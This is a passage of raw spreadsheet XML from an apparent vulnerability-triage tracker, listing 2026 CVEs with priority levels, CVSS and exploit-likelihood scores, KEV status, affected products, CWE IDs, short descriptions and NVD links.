t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G6" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H6" s="5" t="n"><v>0.006</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L6" s="5" t="inlineStr" /><c r="M6" s="5" t="inlineStr" /><c r="N6" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="Q6" s="5" t="inlineStr"><is><t>CWE-284, CWE-59</t></is></c><c r="R6" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-85880</t></is></c><c r="D7" s="5" t="n"><v>7.8</v></c><c r="E7" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G7" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H7" s="5" t="n"><v>0.006</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t></is></c><c r="L7" s="5" t="inlineStr" /><c r="M7" s="5" t="inlineStr" /><c r="N7" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="Q7" s="5" t="inlineStr"><is><t>CWE-122, CWE-908</t></is></c><c r="R7" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2025-25249</t></is></c><c r="D8" s="5" t="inlineStr" /><c r="E8" s="5" t="inlineStr" /><c r="F8" s="5" t="inlineStr" /><c r="G8" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H8" s="5" t="n"><v>0.024</v></c><c r="I8" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J8" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K8" s="5" t="inlineStr"><is><t>fortinet:multiple products</t></is></c><c r="L8" s="5" t="inlineStr" /><c r="M8" s="5" t="inlineStr" /><c r="N8" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O8" s="5" t="inlineStr" /><c r="P8" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr"><is><t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t></is></c><c r="S8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-19490</t></is></c><c r="D9" s="5" t="inlineStr" /><c r="E9" s="5" t="inlineStr" /><c r="F9" s="5" t="inlineStr" /><c r="G9" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H9" s="5" t="n"><v>0.056</v></c><c r="I9" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J9" s="5" t="inlineStr"><is><t>citrix</t></is></c><c r="K9" s="5" t="inlineStr"><is><t>citrix:netscaler</t></is></c><c r="L9" s="5" t="inlineStr" /><c r="M9" s="5" t="inlineStr" /><c r="N9" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O9" s="5" t="inlineStr" /><c r="P9" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q9" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R9" s="5" t="inlineStr"><is><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is></c><c r="S9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-20079</t></is></c><c r="D10" s="5" t="inlineStr" /><c r="E10" s="5" t="inlineStr" /><c r="F10" s="5" t="inlineStr" /><c r="G10" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H10" s="5" t="n"><v>0.758</v></c><c r="I10" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J10" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K10" s="5" t="inlineStr"><is><t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t></is></c><c r="L10" s="5" t="inlineStr" /><c r="M10" s="5" t="inlineStr" /><c r="N10" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O10" s="5" t="inlineStr" /><c r="P10" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr"><is><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is></c><c r="S10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-42016</t></is></c><c r="D11" s="5" t="inlineStr" /><c r="E11" s="5" t="inlineStr" /><c r="F11" s="5" t="inlineStr" /><c r="G11" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H11" s="5" t="n"><v>0.008999999999999999</v></c><c r="I11" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr"><is><t>jfrog:artifactory</t></is></c><c r="L11" s="5" t="inlineStr" /><c r="M11" s="5" t="inlineStr" /><c r="N11" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O11" s="5" t="inlineStr" /><c r="P11" s="5" t="inlineStr"><is><t>2026-09-25</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr"><is><t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t></is></c><c r="S11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-42018</t></is></c><c r="D12" s="5" t="inlineStr" /><c r="E12" s="5" t="inlineStr" /><c r="F12" s="5" t="inlineStr" /><c r="G12" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H12" s="5" t="n"><v>0.008999999999999999</v></c><c r="I12" s="5" t="inlineStr"><is><t>none</t></is></c><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr"><is><t>jfrog:artifactory</t></is></c><c r="L12" s="5" t="inlineStr" /><c r="M12" s="5" t="inlineStr" /><c r="N12" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O12" s="5" t="inlineStr" /><c r="P12" s="5" t="inlineStr"><is><t>2026-09-25</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr"><is><t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t></is></c><c r="S12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-67277</t></is></c><c r="D13" s="5" t="inlineStr" /><c r="E13" s="5" t="inlineStr" /><c r="F13" s="5" t="inlineStr" /><c r="G13" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H13" s="5" t="n"><v>0.008999999999999999</v></c><c r="I13" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J13" s="5" t="inlineStr" /><c r="K13" s="5" t="inlineStr"><is><t>mikrotik:routeros</t></is></c><c r="L13" s="5" t="inlineStr" /><c r="M13" s="5" t="inlineStr" /><c r="N13" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O13" s="5" t="inlineStr" /><c r="P13" s="5" t="inlineStr"><is><t>2026-09-13</t></is></c><c r="Q13" s="5" t="inlineStr" /><c r="R13" s="5" t="inlineStr"><is><t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t></is></c><c r="S13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-75650</t></is></c><c r="D14" s="5" t="inlineStr" /><c r="E14" s="5" t="inlineStr" /><c r="F14" s="5" t="inlineStr" /><c r="G14" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H14" s="5" t="n"><v>0.021</v></c><c r="I14" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr"><is><t>adobe:commerce and magento</t></is></c><c r="L14" s="5" t="inlineStr" /><c r="M14" s="5" t="inlineStr" /><c r="N14" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O14" s="5" t="inlineStr" /><c r="P14" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr"><is><t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t></is></c><c r="S14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-76460</t></is></c><c r="D15" s="5" t="inlineStr" /><c r="E15" s="5" t="inlineStr" /><c r="F15" s="5" t="inlineStr" /><c r="G15" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H15" s="5" t="inlineStr" /><c r="I15" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J15" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K15" s="5" t="inlineStr"><is><t>cisco:identity services engine</t></is></c><c r="L15" s="5" t="inlineStr" /><c r="M15" s="5" t="inlineStr" /><c r="N15" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O15" s="5" t="inlineStr" /><c r="P15" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr"><is><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is></c><c r="S15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-76461</t></is></c><c r="D16" s="5" t="inlineStr" /><c r="E16" s="5" t="inlineStr" /><c r="F16" s="5" t="inlineStr" /><c r="G16" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H16" s="5" t="n"><v>0.02</v></c><c r="I16" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J16" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K16" s="5" t="inlineStr"><is><t>cisco:secure email gateway</t></is></c><c r="L16" s="5" t="inlineStr" /><c r="M16" s="5" t="inlineStr" /><c r="N16" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O16" s="5" t="inlineStr" /><c r="P16" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr"><is><t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t></is></c><c r="S16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-85706</t></is></c><c r="D17" s="5" t="inlineStr" /><c r="E17" s="5" t="inlineStr" /><c r="F17" s="5" t="inlineStr" /><c r="G17" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H17" s="5" t="n"><v>0.12</v></c><c r="I17" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J17" s="5" t="inlineStr"><is><t>gitlab</t></is></c><c r="K17" s="5" t="inlineStr"><is><t>gitlab:community edition and enterprise edition</t></is></c><c r="L17" s="5" t="inlineStr" /><c r="M17" s="5" t="inlineStr" /><c r="N17" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O17" s="5" t="inlineStr" /><c r="P17" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr"><is><t>GitLab Community Edition and Enterprise Edition contains a path traversal vulnerability that allows an unauthenticated user to read arbitrary files due to an improper path confinement and missing authentication enforcement in the repository commits API.</t></is></c><c r="S17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-86060</t></is></c><c r="D18" s="5" t="inlineStr" /><c r="E18" s="5" t="inlineStr" /><c r="F18" s="5" t="inlineStr" /><c r="G18" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H18" s="5" t="n"><v>0.011</v></c><c r="I18" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr"><is><t>mikrotik:routeros</t></is></c><c r="L18" s="5" t="inlineStr" /><c r="M18" s="5" t="inlineStr" /><c r="N18" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O18" s="5" t="inlineStr" /><c r="P18" s="5" t="inlineStr"><is><t>2026-09-13</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr"><is><t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t></is></c><c r="S18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-86218</t></is></c><c r="D19" s="5" t="inlineStr" /><c r="E19" s="5" t="inlineStr" /><c r="F19" s="5" t="inlineStr" /><c r="G19" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H19" s="5" t="n"><v>0.007</v></c><c r="I19" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr"><is><t>n-able:n-central</t></is></c><c r="L19" s="5" t="inlineStr" /><c r="M19" s="5" t="inlineStr" /><c r="N19" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O19" s="5" t="inlineStr" /><c r="P19" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr"><is><t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t></is></c><c r="S19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-87886</t></is></c><c r="D20" s="5" t="inlineStr" /><c r="E20" s="5" t="inlineStr" /><c r="F20" s="5" t="inlineStr" /><c r="G20" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H20" s="5" t="inlineStr" /><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr"><is><t>acronis:backup</t></is></c><c r="L20" s="5" t="inlineStr" /><c r="M20" s="5" t="inlineStr" /><c r="N20" s="5" t="inlineStr"><is><t>KEV</t></is></c><c r="O20" s="5" t="inlineStr" /><c r="P20" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr"><is><t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t></is></c><c r="S20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D21" s="5" t="inlineStr" /><c r="E21" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.868</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr" /><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr"><is><t>go:gitea.dev</t></is></c><c r="M21" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N21" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O21" s="5" t="inlineStr" /><c r="P21" s="5" t="inlineStr" /><c r="Q21" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R21"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S21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-44756</t></is></c><c r="D22" s="5" t="n"><v>10</v></c><c r="E22" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr" /><c r="M22" s="5" t="inlineStr" /><c r="N22" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr" /><c r="Q22" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R22" s="5" t="inlineStr"><is><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is></c><c r="S22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D23" s="5" t="n"><v>10</v></c><c r="E23" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.012</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr"><is><t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL, nuget:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M23" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N23" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O23" s="5" t="inlineStr" /><c r="P23" s="5" t="inlineStr" /><c r="Q23" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R23"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S23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-70352</t></is></c><c r="D24" s="5" t="n"><v>10</v></c><c r="E24" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.006</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr" /><c r="L24" s="5" t="inlineStr" /><c r="M24" s="5" t="inlineStr" /><c r="N24" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P24" s="5" t="inlineStr" /><c r="Q24" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R24" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Azure AI Language allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70352</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-77995</t></is></c><c r="D25" s="5" t="n"><v>10</v></c><c r="E25" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>security@joomla.org</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.003</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr"><is><t>keycloak</t></is></c><c r="K25" s="5" t="inlineStr" /><c r="L25" s="5" t="inlineStr" /><c r="M25" s="5" t="inlineStr" /><c r="N25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P25" s="5" t="inlineStr" /><c r="Q25" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R25" s="5" t="inlineStr"><is><t>Joomla Extension - miniorange.com - Arbitrary account takeover in miniOrange OAuth Client &lt; 3.2.0, OAuth Single Sign-On – OIDC SSO &lt; 1.2.2, Login with Keycloak OAuth Single Sign-On (SSO) &lt; 1.2.2, Single Sign-On for Educational Institutes &lt; 1.2.2 - The manipulation of a cookie value allows actors to login as arbitrary accounts, including admins.</t></is></c><c r="S25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77995</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-77998</t></is></c><c r="D26" s="5" t="n"><v>10</v></c><c r="E26" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>security@joomla.org</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.003</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K26" s="5" t="inlineStr" /><c r="L26" s="5" t="inlineStr" /><c r="M26" s="5" t="inlineStr" /><c r="N26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P26" s="5" t="inlineStr" /><c r="Q26" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R26" s="5" t="inlineStr"><is><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is></c><c r="S26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77998</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-80098</t></is></c><c r="D27" s="5" t="n"><v>10</v></c><c r="E27" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.003</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr" /><c r="K27" s="5" t="inlineStr"><is><t>microsoft:copilot_studio</t></is></c><c r="L27" s="5" t="inlineStr" /><c r="M27" s="5" t="inlineStr" /><c r="N27" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P27" s="5" t="inlineStr" /><c r="Q27" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R27" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Copilot Studio allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80098</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-82004</t></is></c><c r="D28" s="5" t="n"><v>10</v></c><c r="E28" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.014</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr"><is><t>adobe:campaign</t></is></c><c r="L28" s="5" t="inlineStr" /><c r="M28" s="5" t="inlineStr" /><c r="N28" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr" /><c r="Q28" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R28" s="5" t="inlineStr"><is><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is></c><c r="S28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-83711</t></is></c><c r="D29" s="5" t="n"><v>10</v></c><c r="E29" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.006</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr" /><c r="K29" s="5" t="inlineStr" /><c r="L29" s="5" t="inlineStr" /><c r="M29" s="5" t="inlineStr" /><c r="N29" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P29" s="5" t="inlineStr" /><c r="Q29" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R29" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Microsoft Azure Active Directory B2C allows an unauthorized 